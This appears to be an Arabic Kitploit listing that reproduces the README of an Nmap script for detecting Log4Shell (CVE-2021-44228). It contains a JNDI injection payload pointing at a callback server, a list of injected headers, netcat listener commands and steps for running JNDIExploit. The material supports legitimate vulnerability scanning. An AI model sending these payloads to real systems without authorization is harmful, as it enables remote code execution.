Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nmap-log4shell — سكربت Nmap Log4Shell NSE لاكتشاف Apache Log4j RCE (CVE-2021-44228) | Kitploit
أدوات/GitHubGitHub/giterlizzi/nmap-log4shell
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFأمن الشبكاتاختبار الاختراق
GitHubgiterlizzi/nmap-log4shell

nmap-log4shell

سكربت Nmap Log4Shell NSE لاكتشاف Apache Log4j RCE (CVE-2021-44228)

عرض المستودع
7820منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سكربت NSE من Nmap لاكتشاف Apache Log4j RCE (CVE-2021-44228)

script nmap-log4shell هو سكربت NSE لاكتشاف ثغرة Apache Log4j RCE (CVE-2021-44228) عبر الشبكة. يستطيع السكربت حقن حمولة استغلال log4shell عبر ترويسات HTTP (الافتراضي) أو عبر مقبس TCP/UDP.

الثغرة

CVE-2021-44228 هي ثغرة تنفيذ برمجي عن بُعد (RCE) في Apache Log4j 2. يمكن لمهاجم بعيد غير مصادق استغلال هذا الخلل بإرسال طلب مصمم خصيصًا إلى خادم يشغّل إصدارًا معرضًا للخطر من log4j. يستخدم الطلب المصمم حقنًا عبر Java Naming and Directory Interface (JNDI) من خلال مجموعة من الخدمات تشمل:

  • بروتوكول الوصول إلى الدليل الخفيف (LDAP)
  • LDAP الآمن (LDAPS)
  • استدعاء الأسلوب عن بُعد (RMI)
  • خدمة اسم النطاق (DNS)

إذا كان الخادم المعرض للخطر يستخدم log4j لتسجيل الطلبات، فسيقوم الاستغلال بعد ذلك بطلب حمولة خبيثة عبر JNDI من خلال إحدى الخدمات المذكورة أعلاه من خادم يتحكم به المهاجم. قد يؤدي الاستغلال الناجح إلى تنفيذ برمجي عن بُعد (RCE).

التثبيت

حدد مكان سكربتات nmap على نظامك:

  • على نظام *nix قد يكون ~/.nmap/scripts/ أو $NMAPDIR
  • على Mac قد يكون /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
  • على Windows قد يكون C:\Program Files (x86)\Nmap\scripts

انسخ السكربت المرفق (log4shell.nse) إلى هذا الدليل ثم شغّل nmap --script-updatedb لتحديث قاعدة بيانات سكربتات nmap.

الاستخدام

root@kitploit:~
nmap --script log4shell.nse --script-args log4shell.callback-server=172.17.42.1:1389 -p 8080 172.17.42.2 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 21:26 CET
Nmap scan report for 172.17.42.1
Host is up (0.000096s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy
| log4shell: 
|   Payloads:
|     ${jndi:ldap:/172.17.42.1:389/log4shell}
|   Test Method: HTTP
|   URL Path: /
|   HTTP Method: GET
|   HTTP Headers: 
|     Access-Control-Request-Method: 200 
|     Accept: 200 
|     Access-Control-Request-Headers: 200 
|     Accept-Charset: 200 
|     X-Api-Version: 200 
|     Warning: 200 
|     Pragma: 200 
|     Upgrade-Insecure-Requests: 200 
|     Range,: 400 
|     Hostname: 200 
|     Content-Length: 400 
|     Dnt: 200 
|     Date: 200 
|     Username: 200 
|     Content-Encoding: 200 
|     Content-Type: 200 
|     Forwarded: 200 
|     Max-Forwards: 200 
|     Accept-Encoding: 200 
|     Referer: 200 
|     IP: 200 
|     IPaddress: 200 
|     X-Amz-Date: 200 
|     X-Amz-Target: 200 
|     TE: 200 
|     Content-Disposition: 200 
|     X-Requested-With: 200 
|     upgrade-insecure-requests: 200 
|     Authorization: 200 
|     Cookie: 200 
|     User-Agent: 200 
|     Accept-Language: 200 
|     Proxy-Authorization: 200 
|     Expect: 417 
|     From: 200 
|     Accept-Datetime: 200 
|     X-CSRF-Token: 200 
|     Origin: 200 
|_  Note: (!) Inspect the callback server (172.17.42.1:389) or web-application (172.17.42.2:8080) logs

الوسائط

  • log4shell.callback-server: خادم الاستدعاء (مثل: 172.17.42.1:1389)
  • log4shell.http-headers: قائمة مفصولة بفواصل من ترويسات HTTP (مثل: X-Api-Version,User-Agent,Referer)
  • log4shell.http-method: طريقة HTTP (الافتراضي: GET)
  • log4shell.url-path: مسار URL (الافتراضي: /)
  • log4shell.waf-bypass: استخدام حمولات تجاوز WAF (الافتراضي: false)
  • log4shell.test-method: الاختبار عبر http (الافتراضي) أو tcp أو udp أو

خادم الاستدعاء

يعتمد السكربت على الاستدعاءات من الهدف الذي يتم فحصه، وبالتالي فإن أي قواعد لجدار الحماية أو تفاعل مع أجهزة أمنية أخرى ستؤثر على فعالية السكربت.

Netcat أو Ncat

استمع إلى منفذ TCP باستخدام netcat (أو ncat):

root@kitploit:~
ncat -vkl 1389   # Ncat
nc -lvnp 1389    # Netcat

شغّل Nmap باستخدام السكربت --script log4shell.nse:

root@kitploit:~
nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>] <target>

شاهد عنوان IP الخاص بالهدف في مخرجات netcat (أو ncat):

root@kitploit:~
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:38898.

JNDIExploit

نزّل JNDIExploit من GitHub (https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip)

شغّل خادم JNDIExploit:

root@kitploit:~
java -jar JNDIExploit.jar

شغّل Nmap باستخدام السكربت --script log4shell.nse:

root@kitploit:~
nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>] <target>

شاهد مخرجات JNDIExploit لرؤية استعلام LDAP المستلم:

root@kitploit:~
[+] Received LDAP Query: log4shell
[!] Invalid LDAP Query: log4shell

إخلاء مسؤولية قانوني

صُنع هذا المشروع لأغراض تعليمية واختبارات أخلاقية فقط. استخدام nmap-log4shell لمهاجمة الأهداف دون موافقة متبادلة مسبقة غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

الترخيص

المشروع مرخّص بموجب رخصة MIT.

المؤلف

  • Giuseppe Di Terlizzi (giterlizzi)
تنزيل الأداة
all